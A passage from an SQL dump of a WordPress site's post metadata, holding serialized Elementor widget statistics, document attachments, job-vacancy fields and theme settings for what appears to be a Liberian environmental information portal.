5:\"count\";i:11;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:7;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:1:{s:7:\"padding\";i:4;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:9;s:15:\"control_percent\";i:2;s:8:\"controls\";a:3:{s:6:\"layout\";a:3:{s:14:\"section_layout\";a:5:{s:6:\"layout\";i:2;s:3:\"gap\";i:1;s:15:\"stretch_section\";i:5;s:6:\"height\";i:1;s:13:\"custom_height\";i:1;}s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:9;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:1;}}s:8:\"advanced\";a:2:{s:16:\"section_advanced\";a:2:{s:6:\"margin\";i:2;s:7:\"padding\";i:4;}s:19:\"_section_responsive\";a:3:{s:20:\"reverse_order_tablet\";i:1;s:20:\"reverse_order_mobile\";i:1;s:11:\"hide_mobile\";i:1;}}s:5:\"style\";a:2:{s:18:\"section_background\";a:6:{s:21:\"background_background\";i:4;s:16:\"background_color\";i:1;s:16:\"background_image\";i:2;s:19:\"background_position\";i:2;s:21:\"background_attachment\";i:2;s:15:\"background_size\";i:2;}s:21:\"section_shape_divider\";a:3:{s:26:\"shape_divider_bottom_width\";i:1;s:27:\"shape_divider_bottom_height\";i:1;s:25:\"shape_divider_bottom_flip\";i:1;}}}}s:15:\"jet-ajax-search\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:28:\"section_search_form_settings\";a:4:{s:23:\"search_placeholder_text\";i:1;s:25:\"show_search_category_list\";i:1;s:34:\"search_category_select_placeholder\";i:1;s:15:\"search_taxonomy\";i:1;}s:29:\"section_results_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}s:23:\"section_search_settings\";a:1:{s:13:\"search_source\";i:1;}}s:5:\"style\";a:2:{s:27:\"section_search_submit_style\";a:1:{s:22:\"search_submit_bg_color\";i:1;}s:29:\"section_search_category_style\";a:1:{s:21:\"search_category_color\";i:1;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:3:{s:5:\"title\";i:4;s:11:\"header_size\";i:2;s:5:\"align\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:4:{s:11:\"title_color\";i:4;s:21:\"typography_typography\";i:4;s:20:\"typography_font_size\";i:4;s:22:\"typography_font_weight\";i:2;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:15:\"section_divider\";a:3:{s:5:\"style\";i:2;s:5:\"width\";i:2;s:5:\"align\";i:2;}}s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:2:{s:5:\"color\";i:2;s:6:\"weight\";i:2;}}}}s:20:\"jet-blog-smart-tiles\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:5:{s:10:\"min_height\";i:1;s:10:\"show_terms\";i:1;s:14:\"show_terms_num\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"show_date\";i:1;}s:13:\"section_query\";a:3:{s:9:\"post_type\";i:1;s:15:\"custom_query_by\";i:1;s:8:\"post_ids\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:2:{s:17:\"section_box_style\";a:1:{s:9:\"boxes_gap\";i:1;}s:21:\"section_content_style\";a:6:{s:17:\"boxes_title_color\";i:1;s:23:\"boxes_title_color_hover\";i:1;s:33:\"boxes_title_typography_typography\";i:1;s:32:\"boxes_title_typography_font_size\";i:1;s:34:\"boxes_title_typography_font_weight\";i:1;s:21:\"boxes_title_alignment\";i:1;}}}}s:6:\"button\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_button\";a:6:{s:4:\"text\";i:4;s:4:\"link\";i:4;s:5:\"align\";i:4;s:13:\"selected_icon\";i:3;s:10:\"icon_align\";i:3;s:11:\"icon_indent\";i:3;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:7:{s:21:\"typography_typography\";i:4;s:20:\"typography_font_size\";i:4;s:25:\"typography_text_transform\";i:4;s:17:\"button_text_color\";i:4;s:16:\"background_color\";i:4;s:11:\"hover_color\";i:4;s:29:\"button_background_hover_color\";i:4;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:2;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:4:{s:10:\"text_color\";i:2;s:21:\"typography_typography\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:9:\"jet-posts\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:11:{s:6:\"number\";i:1;s:7:\"columns\";i:1;s:17:\"equal_height_cols\";i:1;s:13:\"title_trimmed\";i:1;s:12:\"title_length\";i:1;s:14:\"excerpt_length\";i:1;s:10:\"show_terms\";i:1;s:9:\"show_meta\";i:1;s:9:\"show_more\";i:1;s:11:\"show_author\";i:1;s:13:\"show_comments\";i:1;}s:27:\"section_posts_custom_fields\";a:4:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;s:27:\"meta_title_related_position\";i:1;s:29:\"meta_content_related_position\";i:1;}s:16:\"section_carousel\";a:3:{s:6:\"arrows\";i:1;s:8:\"autoplay\";i:1;s:8:\"infinite\";i:1;}}s:5:\"style\";a:4:{s:21:\"section_content_style\";a:2:{s:10:\"content_bg\";i:1;s:15:\"content_padding\";i:1;}s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:1;s:27:\"title_typography_typography\";i:1;s:26:\"title_typography_font_size\";i:1;s:28:\"title_typography_font_weight\";i:1;s:17:\"title_color_hover\";i:1;}s:21:\"section_excerpt_style\";a:3:{s:13:\"excerpt_color\";i:1;s:29:\"excerpt_typography_typography\";i:1;s:28:\"excerpt_typography_font_size\";i:1;}s:24:\"section_terms_link_style\";a:3:{s:32:\"terms_link_typography_typography\";i:1;s:31:\"terms_link_typography_font_size\";i:1;s:19:\"terms_link_bg_color\";i:1;}}}}}'),(38681,5803,'closed_date','2026-03-19'),(38682,5803,'owner','EPA'),(38683,5803,'vacancy_link',''),(38684,5805,'_wp_attached_file','2026/03/Institutional-Expert.pdf'),(38670,5799,'_edit_last','38'),(38671,5799,'_wp_page_template','default'),(38672,5799,'closed_date','2026-04-02'),(38673,5799,'owner','EPA'),(38674,5799,'vacancy_link',''),(38675,5801,'_wp_attached_file','2026/03/Economic-and-Market-Expert.docx'),(38676,5801,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:73427;}'),(38677,5803,'_last_editor_used_jetpack','classic-editor'),(38678,5803,'_edit_lock','1773086395:38'),(38679,5803,'_edit_last','38'),(38680,5803,'_wp_page_template','default'),(38664,5793,'owner','EPA/AFDB'),(38665,5793,'vacancy_link',''),(38668,5799,'_last_editor_used_jetpack','classic-editor'),(38669,5799,'_edit_lock','1774622428:38'),(38655,5789,'owner',''),(38656,5789,'vacancy_link',''),(38657,5793,'_last_editor_used_jetpack','classic-editor'),(38658,5793,'_edit_lock','1771841114:38'),(38659,5793,'_edit_last','38'),(38660,5794,'_wp_attached_file','2026/02/Procurement-Officer-1.docx'),(38661,5794,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:80904;}'),(38662,5793,'_wp_page_template','default'),(38663,5793,'closed_date','2026-03-09'),(38651,5789,'_edit_lock','1771949150:38'),(38652,5789,'_edit_last','38'),(38653,5789,'_wp_page_template','default'),(38654,5789,'closed_date','2026-02-28'),(38644,5785,'kava_extra_video_height','480'),(38645,5785,'kava_extra_video_loop','false'),(38646,5785,'kava_extra_video_autoplay','false'),(38647,5785,'kava_extra_video_preload','false'),(38784,5824,'_edit_lock','1773750164:38'),(38650,5789,'_last_editor_used_jetpack','classic-editor'),(38642,5785,'kava_extra_video_poster',''),(38643,5785,'kava_extra_video_width','770'),(38633,5785,'audio_tab',''),(38634,5785,'kava_extra_audio',''),(38635,5785,'kava_extra_audio_loop','false'),(38636,5785,'kava_extra_audio_autoplay','false'),(38637,5785,'kava_extra_audio_preload','false'),(38638,5785,'video_tab',''),(38639,5785,'kava_extra_video_type','library'),(38640,5785,'kava_extra_video_library',''),(38641,5785,'kava_extra_video_external',''),(38629,5785,'kava_extra_link_target','_blank'),(38630,5785,'quote_tab',''),(38631,5785,'kava_extra_quote_text',''),(38632,5785,'kava_extra_quote_cite',''),(38625,5785,'gallery_tab',''),(38626,5785,'kava_extra_gallery_images',''),(38627,5785,'link_tab',''),(38628,5785,'kava_extra_link',''),(38620,5785,'_edit_last','38'),(38619,5785,'_thumbnail_id','5786'),(38783,5824,'_last_editor_used_jetpack','classic-editor'),(38623,5785,'kava_extra_enable_breadcrumbs','inherit'),(38624,5785,'post_formats',''),(35339,1766,'_last_editor_used_jetpack','classic-editor'),(35340,1766,'_wp_page_template','default'),(35341,1766,'_pods_document_cover_image','a:1:{i:0;i:1694;}'),(35342,1766,'document_cover_image','1694'),(35343,1766,'attached_document','1767'),(35344,1713,'_last_editor_used_jetpack','classic-editor'),(35345,1713,'_wp_page_template','default'),(35346,1713,'_pods_document_cover_image','a:1:{i:0;i:1691;}'),(35347,1713,'document_cover_image','1691'),(35348,1713,'attached_document','1714'),(35349,1711,'_wp_page_template','default'),(35350,1711,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35351,1711,'document_cover_image','1686'),(35352,1711,'attached_document','1712'),(35353,1715,'_last_editor_used_jetpack','classic-editor'),(35354,1718,'_last_editor_used_jetpack','classic-editor'),(35355,1720,'_last_editor_used_jetpack','classic-editor'),(35356,1720,'_wp_page_template','default'),(35357,1720,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35358,1720,'document_cover_image','1686'),(35359,1720,'attached_document','1721'),(35360,1718,'_wp_page_template','default'),(35361,1718,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35362,1718,'document_cover_image','1686'),(35363,1718,'attached_document','1719'),(35364,1715,'_wp_page_template','default'),(35365,1715,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35366,1715,'document_cover_image','1686'),(35367,1715,'attached_document','1716'),(35368,1722,'_last_editor_used_jetpack','classic-editor'),(35369,1724,'_last_editor_used_jetpack','classic-editor'),(35370,1726,'_last_editor_used_jetpack','classic-editor'),(35371,1726,'_wp_page_template','default'),(35372,1726,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35373,1726,'document_cover_image','1686'),(35374,1726,'attached_document','1727'),(35375,1724,'_wp_page_template','default'),(35376,1724,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35377,1724,'document_cover_image','1686'),(35378,1724,'attached_document','1725'),(35379,1722,'_wp_page_template','default'),(35380,1722,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35381,1722,'document_cover_image','1686'),(35382,1722,'attached_document','1723'),(35383,1780,'_last_editor_used_jetpack','classic-editor'),(35384,1778,'_last_editor_used_jetpack','classic-editor'),(35385,1776,'_last_editor_used_jetpack','classic-editor'),(35386,1774,'_last_editor_used_jetpack','classic-editor'),(35387,1780,'_wp_page_template','default'),(35388,1780,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35389,1780,'document_cover_image','1686'),(35390,1780,'attached_document','1781'),(35391,1778,'_wp_page_template','default'),(35392,1778,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35393,1778,'document_cover_image','1686'),(35394,1778,'attached_document','1779'),(35395,1776,'_wp_page_template','default'),(35396,1776,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35397,1776,'document_cover_image','1686'),(35398,1776,'attached_document','1777'),(35399,1774,'_wp_page_template','default'),(35400,1774,'_pods_document_cover_image','a:1:{i:0;i:1694;}'),(35401,1774,'document_cover_image','1694'),(35402,1774,'attached_document','1775'),(35403,1772,'_last_editor_used_jetpack','classic-editor'),(35404,1770,'_last_editor_used_jetpack','classic-editor'),(35405,1768,'_last_editor_used_jetpack','classic-editor'),(35406,1772,'_wp_page_template','default'),(35407,1772,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35408,1772,'document_cover_image','1686'),(35409,1772,'attached_document','1773'),(35410,1770,'_wp_page_template','default'),(35411,1770,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35412,1770,'document_cover_image','1686'),(35413,1770,'attached_document','1771'),(35414,1768,'_wp_page_template','default'),(35415,1768,'_pods_document_cover_image','a:1:{i:0;i:1691;}'),(35416,1768,'document_cover_image','1691'),(35417,1768,'attached_document','1769'),(35418,1751,'_last_editor_used_jetpack','classic-editor'),(35419,1749,'_last_editor_used_jetpack','classic-editor'),(35420,1745,'_last_editor_used_jetpack','classic-editor'),(35421,1743,'_last_editor_used_jetpack','classic-editor'),(35422,1751,'_wp_page_template','default'),(35423,1751,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35424,1751,'document_cover_image','1686'),(35425,1751,'attached_document','1752'),(35426,1749,'_wp_page_template','default'),(35427,1749,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35428,1749,'document_cover_image','1686'),(35429,1749,'attached_document','1750'),(35430,1745,'_wp_page_template','default'),(35431,1745,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35432,1745,'document_cover_image','1686'),(35433,1745,'attached_document','1746'),(35434,1743,'_wp_page_template','default'),(35435,1743,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35436,1743,'document_cover_image','1686'),(35437,1743,'attached_document','1744'),(35438,1741,'_last_editor_used_jetpack','classic-editor'),(35439,1739,'_last_editor_used_jetpack','classic-editor'),(35440,1734,'_last_editor_used_jetpack','classic-editor'),(35441,1741,'_wp_page_template','default'),(35442,1741,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35443,1741,'document_cover_image','1686'),(35444,1741,'attached_document','1742'),(35445,1739,'_wp_page_template','default'),(35446,1739,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35447,1739,'document_cover_image','1686'),(35448,1739,'attached_document','1740'),(35449,1737,'_wp_page_template','default'),(35450,1737,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35451,1737,'document_cover_image','1686'),(35452,1737,'attached_document','1738'),(35453,1734,'_wp_page_template','default'),(35454,1734,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35455,1734,'document_cover_image','1686'),(35456,1734,'attached_document','1736'),(35457,1732,'_last_editor_used_jetpack','classic-editor'),(35458,1730,'_last_editor_used_jetpack','classic-editor'),(35459,1728,'_last_editor_used_jetpack','classic-editor'),(35460,1732,'_wp_page_template','default'),(35461,1732,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35462,1732,'document_cover_image','1686'),(35463,1732,'attached_document','1733'),(35464,1730,'_wp_page_template','default'),(35465,1730,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35466,1730,'document_cover_image','1686'),(35467,1730,'attached_document','1731'),(35468,1728,'_wp_page_template','default'),(35469,1728,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35470,1728,'document_cover_image','1686'),(35471,1728,'attached_document','1729'),(35472,2751,'_last_editor_used_jetpack','classic-editor'),(35473,2991,'_last_editor_used_jetpack','classic-editor'),(35474,3226,'_wp_page_template','default'),(35475,3226,'_pods_document_cover_image','a:1:{i:0;i:4026;}'),(35476,3226,'document_cover_image','4026'),(35477,3226,'attached_document','3227'),(35478,2751,'_wp_page_template','default'),(35479,2751,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35480,2751,'document_cover_image','1686'),(35481,2751,'attached_document','2752'),(35482,2991,'_wp_page_template','default'),(35483,2991,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35484,2991,'document_cover_image','1686'),(35485,2991,'attached_document','2992'),(35486,2296,'_last_editor_used_jetpack','classic-editor'),(35487,2293,'_last_editor_used_jetpack','classic-editor'),(35488,2252,'_last_editor_used_jetpack','classic-editor'),(35489,2248,'_last_editor_used_jetpack','classic-editor'),(35490,2178,'_last_editor_used_jetpack','classic-editor'),(35491,2296,'_wp_page_template','default'),(35492,2296,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35493,2296,'document_cover_image','1686'),(35494,2296,'attached_document','2295'),(35495,2293,'_wp_page_template','default'),(35496,2293,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35497,2293,'document_cover_image','1686'),(35498,2293,'attached_document','2294'),(35499,2252,'_wp_page_template','default'),(35500,2252,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35501,2252,'document_cover_image','1686'),(35502,2252,'attached_document','2253'),(35503,2248,'_wp_page_template','default'),(35504,2248,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35505,2248,'document_cover_image','1686'),(35506,2248,'attached_document','2249'),(35507,2178,'_wp_page_template','default'),(35508,2178,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35509,2178,'document_cover_image','1686'),(35510,2178,'attached_document','2179'),(35511,2161,'_last_editor_used_jetpack','classic-editor'),(35512,2159,'_last_editor_used_jetpack','classic-editor'),(35513,2156,'_last_editor_used_jetpack','classic-editor'),(35514,2154,'_last_editor_used_jetpack','classic-editor'),(35515,2152,'_last_editor_used_jetpack','classic-editor'),(35516,2161,'_wp_page_template','default'),(35517,2161,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35518,2161,'document_cover_image','1686'),(35519,2161,'attached_document','2164'),(35520,2159,'_wp_page_template','default'),(35521,2159,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35522,2159,'document_cover_image','1686'),(35523,2159,'attached_document','2160'),(35524,2156,'_wp_page_template','default'),(35525,2156,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35526,2156,'document_cover_image','1686'),(35527,2156,'attached_document','2157'),(35528,2154,'_wp_page_template','default'),(35529,2154,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35530,2154,'document_cover_image','1686'),(35531,2154,'attached_document','2155'),(35532,2152,'_wp_page_template','default'),(35533,2152,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35534,2152,'document_cover_image','1686'),(35535,2152,'attached_document','2153'),(35536,2150,'_last_editor_used_jetpack','classic-editor'),(35537,2148,'_last_editor_used_jetpack','classic-editor'),(35538,1782,'_last_editor_used_jetpack','classic-editor'),(35539,2150,'_wp_page_template','default'),(35540,2150,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35541,2150,'document_cover_image','1686'),(35542,2150,'attached_document','2151'),(35543,2148,'_wp_page_template','default'),(35544,2148,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35545,2148,'document_cover_image','1686'),(35546,2148,'attached_document','2149'),(35547,1782,'_wp_page_template','default'),(35548,1782,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35549,1782,'document_cover_image','1686'),(35550,1782,'attached_document','1783'),(35551,3265,'_wp_page_template','default'),(35552,3265,'_pods_document_cover_image','a:1:{i:0;i:3565;}'),(35553,3265,'document_cover_image','3565'),(35554,3265,'attached_document','3266'),(35555,3267,'_wp_page_template','default'),(35556,3267,'_pods_document_cover_image','a:1:{i:0;i:3567;}'),(35557,3267,'document_cover_image','3567'),(35558,3267,'attached_document','3268'),(35559,3269,'_wp_page_template','default'),(35560,3269,'_pods_document_cover_image','a:1:{i:0;i:3568;}'),(35561,3269,'document_cover_image','3568'),(35562,3269,'attached_document','3270'),(35563,3273,'_wp_page_template','default'),(35564,3273,'_pods_document_cover_image','a:1:{i:0;i:3570;}'),(35565,3273,'document_cover_image','3570'),(35566,3273,'attached_document','3274'),(35567,3275,'_wp_page_template','default'),(35568,3275,'_pods_document_cover_image','a:1:{i:0;i:4024;}'),(35569,3275,'document_cover_image','4024'),(35570,3275,'attached_document','3276'),(35571,3247,'_wp_page_template','default'),(35572,3247,'_pods_document_cover_image','a:1:{i:0;i:3572;}'),(35573,3247,'document_cover_image','3572'),(35574,3247,'attached_document','3248'),(35575,2658,'_wp_page_template','default'),(35576,2658,'_pods_document_cover_image','a:1:{i:0;i:3574;}'),(35577,2658,'document_cover_image','3574'),(35578,2658,'attached_document','2659'),(35579,2309,'_wp_page_template','default'),(35580,2309,'_pods_document_cover_image','a:1:{i:0;i:3575;}'),(35581,2309,'document_cover_image','3575'),(35582,2309,'attached_document','2312'),(35583,2609,'_wp_page_template','default'),(35584,2609,'_pods_document_cover_image','a:1:{i:0;i:3576;}'),(35585,2609,'document_cover_image','3576'),(35586,2609,'attached_document','2610'),(35587,3109,'_wp_page_template','default'),(35588,3109,'_pods_document_cover_image','a:1:{i:0;i:4032;}'),(35589,3109,'document_cover_image','4032'),(35590,3109,'attached_document','3110'),(35591,2993,'_last_editor_used_jetpack','classic-editor'),(35592,3079,'_last_editor_used_jetpack','classic-editor'),(35593,2993,'_wp_page_template','default'),(35594,2993,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35595,2993,'document_cover_image','1686'),(35596,2993,'attached_document','2994'),(35597,3079,'_wp_page_template','default'),(35598,3079,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(35599,3079,'document_cover_image','1686'),(35600,3079,'attached_document','3080'),(35601,3285,'_wp_page_template','default'),(35602,3285,'_pods_document_cover_image','a:1:{i:0;i:3549;}'),(35603,3285,'document_cover_image','3549'),(35604,3285,'attached_document','3286'),(35605,3280,'_wp_page_template','default'),(35606,3282,'_wp_page_template','default'),(35607,3280,'_pods_document_cover_image','a:1:{i:0;i:3551;}'),(35608,3280,'document_cover_image','3551'),(35609,3280,'attached_document','3281'),(35610,3282,'_pods_document_cover_image','a:1:{i:0;i:3550;}'),(35611,3282,'document_cover_image','3550'),(35612,3282,'attached_document','3283'),(35613,5248,'_last_editor_used_jetpack','classic-editor'),(35614,5248,'_edit_lock','1670866870:42'),(35615,5248,'_edit_last','42'),(35616,5249,'_wp_attached_file','2022/12/Untitled.png'),(35617,5249,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:20:\"2022/12/Untitled.png\";s:8:\"filesize\";i:75141;s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"Untitled-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:25422;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"Untitled-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:81362;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:19:\"Untitled-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:18472;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:20:\"Untitled-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:65045;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(35618,5250,'_wp_attached_file','2022/12/ENVIRONMENTAL-AWARENESS-CURRICULUM-MODULES.pdf'),(35619,5250,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:3299349;}'),(35620,5248,'_wp_page_template','default'),(35621,5248,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/12/ENVIRONMENTAL-AWARENESS-CURRICULUM-MODULES.pdf'),(35622,5248,'by','DEEP'),(35623,5248,'year','2020'),(35624,5248,'_pods_document_cover_image','a:1:{i:0;i:5249;}'),(35625,5248,'document_cover_image','5249'),(35626,5248,'_pods_attached_document','a:1:{i:0;i:5250;}'),(35627,5248,'attached_document','5250'),(35628,5253,'_edit_lock','1674059968:42'),(35629,5253,'_last_editor_used_jetpack','block-editor'),(35630,5254,'_wp_attached_file','2023/01/WhatsApp-Image-2023-01-18-at-14.14.37-1.jpeg'),(35631,5254,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:52:\"2023/01/WhatsApp-Image-2023-01-18-at-14.14.37-1.jpeg\";s:8:\"filesize\";i:249890;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2023-01-18-at-14.14.37-1-300x155.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12007;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2023-01-18-at-14.14.37-1-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5943;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2023-01-18-at-14.14.37-1-768x398.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:76810;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2023-01-18-at-14.14.37-1-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26884;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2023-01-18-at-14.14.37-1-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3916;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2023-01-18-at-14.14.37-1-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13419;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2023-01-18-at-14.14.37-1-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38880;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2023-01-18-at-14.14.37-1-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:44132;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2023-01-18-at-14.14.37-1-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62541;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2023-01-18-at-14.14.37-1-600x311.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47065;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2023-01-18-at-14.14.37-1-640x530.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:94770;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(35634,5253,'_thumbnail_id','5254'),(35635,5253,'_edit_last','42'),(35636,5253,'kava_extra_enable_breadcrumbs','inherit'),(35637,5253,'post_formats',''),(35638,5253,'gallery_tab',''),(35639,5253,'kava_extra_gallery_images',''),(35640,5253,'link_tab',''),(35641,5253,'kava_extra_link',''),(35642,5253,'kava_extra_link_target','_blank'),(35643,5253,'quote_tab',''),(35644,5253,'kava_extra_quote_text',''),(35645,5253,'kava_extra_quote_cite',''),(35646,5253,'audio_tab',''),(35647,5253,'kava_extra_audio',''),(35648,5253,'kava_extra_audio_loop','false'),(35649,5253,'kava_extra_audio_autoplay','false'),(35650,5253,'kava_extra_audio_preload','false'),(35651,5253,'video_tab',''),(35652,5253,'kava_extra_video_type','library'),(35653,5253,'kava_extra_video_library',''),(35654,5253,'kava_extra_video_external',''),(35655,5253,'kava_extra_video_poster',''),(35656,5253,'kava_extra_video_width','770'),(35657,5253,'kava_